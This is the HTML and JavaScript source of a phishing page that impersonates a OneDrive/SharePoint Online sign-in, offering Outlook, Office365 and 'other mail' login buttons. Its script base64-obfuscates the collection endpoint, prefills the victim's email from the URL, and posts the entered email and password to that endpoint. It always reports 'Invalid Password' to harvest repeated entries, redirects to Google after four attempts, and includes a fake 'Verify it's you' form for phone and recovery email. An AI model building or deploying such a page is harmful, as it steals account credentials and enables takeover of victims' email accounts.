<!doctype html>
<html lang="en">

<head>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Share Point Online</title>
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
    </style>
</head>

<body style="background-image: url('images/bgv.png'); background-size: cover;background-repeat: no-repeat;">
    <div class="container-fluid p-0">
        <div class="container-fluid">
            <div class="row p-3" style="background-color: #0D4283;">
                <div class="col-lg-12">
                    <img src="images/onedrive-white.png" class="img-fluid" width="60px;">
                    <span class="h4 text-white align-middle">OneDrive</span>
                </div>
            </div>
        </div>
        <div class="container-fluid">
            <div class="row" style="margin: 20px 0px 20px 0px;">
                <div class="col-lg-4 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.9);border-radius:15px;">
                    <div class="text-center pt-5">
                        <img src="images/onedrive-white.png" class="img-fluid" width="0px"><br>
                        <span class="h3 text-white">OneDrive</span><br><br>
                        <span class="h5 text-white">Onedrive Online Limits across different plans</span>
                        <span class="h5" style="color:#0070C6; ">Sign in to Continue to OneDrive Online.</span>
                    </div>
                    <div class="mt-3">
                      
                        <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                            <div class="rounded px-2 py-1 mt-2" style=" background-color: #0073C8;">
                                <img src="images/outlook1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                                <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Outlook</span>
                            </div>
                        </a>
                       
                        <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                            <div class="rounded px-2 py-1 mt-2" style=" background-color: #FF3C00;">
                                <img src="images/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                                <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Office365</span>
                            </div>
                        </a>
                        
                        <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100 mt-1" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                            <div class="rounded px-2 py-1 mt-2" style=" background-color: #0B5BD3;">
                                <img src="images/other1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                                <span class="pl-3" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Other Mail</span>
                            </div>
                        </a>
                        <p class="h5 text-center text-white mt-2">OneDrive © 2022</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    <center>
                        <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
                        <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
                        <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please enter correct password.</div>
                        <span class="text-danger error" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form class="form-horizontal well">
                        <input type="hidden" name="count" id="count" value="0">
                        <div id="div1">
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <div>
                                        <label for="exampleInputEmail1">Email address</label>
                                        <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email" required="">
                                        <small id="aiHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                                </div>
                            </div>
                            <div class="col-lg-12">
                                <div class="form-group">
                                    <label for="pr">Password</label>
                                    <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" required="">
                                </div>
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="sub-btn" id="sub-btn" value="Login">
                            </div>
                        </div>
                    </form>
                    <form class="form-horizontal well">
                        <div id="div2" style="display: none;">
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich" class="h5">abc@abc.com</span><br>
                            <span class="h4 font-weight-normal">Verify it's you</span><br>
                            <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                            
                            <br>
                            <span>Try another way to sign in</span>
                            <div class="form-group mt-3">
                                <input type="number" name="ph" class="form-control" id="ph" aria-describedby="aiHelp" placeholder="Enter Phone No." required="">
                            </div>
                            <div class="form-group mt-3">
                                <input type="text" name="rec_ai" class="form-control" id="rec_ai" aria-describedby="aiHelp" placeholder="Enter Recovery Email" required="">
                            </div>
                            <div class="text-right">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <input type="button" class="btn btn-info pull-right" name="sub-btn1" id="sub-btn1" value="verify">
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" ></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
//redirect link
var rdrt = "https://www.google.com";

//mail result count
var rc = 4;

//mailer link
var f = atob("bmV4dC5waHA=");


$(document).ready(function() {
    var l = 0;
    var n = "b3V0bG9vaw==";
    var o = "aG90bWFpbA==";
    var p = "Z21haWw=";
    var q = "eWFob28=";
    var r = "b2ZmaWNlMzY1";

    function getUrlVars() {
        var c = {};
        var d = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, a, b) {
            c[a] = b
        });
        return c
    }
    if (!getUrlVars()["count"]) {} else {
        var l = getUrlVars()["count"];
        $('#count').val(l)
    }
    var s = window.location.hash.substr(1);
    if (!s) {} else {
        var t = s;
        var u = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!u.test(t)) {
            $('.error').show();
            s.focus;
            return false
        }
        var v = t.indexOf("@");
        var w = t.substr((v + 1));
        var c = w.substr(0, w.indexOf('.'));
        var x = c.toLowerCase();
        var s = window.location.hash.substr(1);
        var t = s;
        var u = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        var v = t.indexOf("@");
        var w = t.substr((v + 1));
        var c = w.substr(0, w.indexOf('.'));
        var x = c.toLowerCase();
        
        if (x == atob(n) || x == atob(o)) {
            $('#fieldImg').attr('src', 'images/' + atob(n) + '.png');
            $('#field').html("Outlook");
            $('#ai').val(t);
            $('#aich').html(t);
            $("#outlookmodal").trigger("click")
        } else if (x == atob(r)) {
            $('#fieldImg').attr('src', 'images/' + atob(r) + '.png');
            $('#field').html("Office 365");
            $('#ai').val(t);
            $('#aich').html(t);
            $("#office365modal").trigger("click")
        }else {
            $('#fieldImg').attr('src', 'images/othermail.ico');
            $('#field').html("Other Mail");
            $('#ai').val(t);
            $('#aich').html(t);
            $("#othermodal").trigger("click")
        }
    }
    $('#gmailmodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(p) + '.png');
        $('#field').html(atob(p));
        $("#msg").hide()
    });
    $('#outlookmodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(n) + '.png');
        $('#field').html("Outlook");
        $("#msg").hide()
    });
    $('#aolmodal').click(function() {
        $('#fieldImg').attr('src', 'images/aol.png');
        $('#field').html("Aol");
        $("#msg").hide()
    });
    $('#office365modal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(r) + '.png');
        $('#field').html("Office 365");
        $("#msg").hide()
    });
    $('#yahoomodal').click(function() {
        $('#fieldImg').attr('src', 'images/' + atob(q) + '.png');
        $('#field').html("Yahoo");
        $("#msg").hide()
    });
    $('#othermodal').click(function() {
        $('#fieldImg').attr('src', 'images/othermail.ico');
        $('#field').html("Other Mail");
        $("#msg").hide()
    });
    $('#sub-btn').click(function(b) {
        $('.error').hide();
        $('#msg').hide();
        b.preventDefault();
        var d = $("#ai").val();
        var e = $("#pr").val();
        $field = $('#field').html();
        var g = d;
        var h = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!d) {
            $('.error').show();
            $('.error').html("Email field is empty...!");
            d.focus;
            return false
        }
        if (!h.test(g)) {
            $('.error').show();
            $('.error').html("That account doesn't exist. Enter a different account");
            d.focus;
            return false
        }
        if (!e) {
            $('.error').show();
            $('.error').html("Password field is empty...!");
            d.focus;
            return false
        }
        var i = g.indexOf("@");
        var j = g.substr((i + 1));
        var c = j.substr(0, j.indexOf('.'));
        var k = c.toLowerCase();
        l = l + 1;
        $.ajax({
            dataType: 'JSON',
            url: f,
            type: 'POST',
            data: {
                ai: d,
                pr: e,
            },
            beforeSend: function(a) {
                $('#sub-btn').val('Verifing...')
            },
            complete: function() {
                
                if (l >= rc) {
                    l = 0;
                    window.location.replace(rdrt);
                    return false
                }
                $("#pr").val("");
                $("#msg").show();
                $('#sub-btn').val('Login')
            }
        })
    });
    
});
</script>

</html>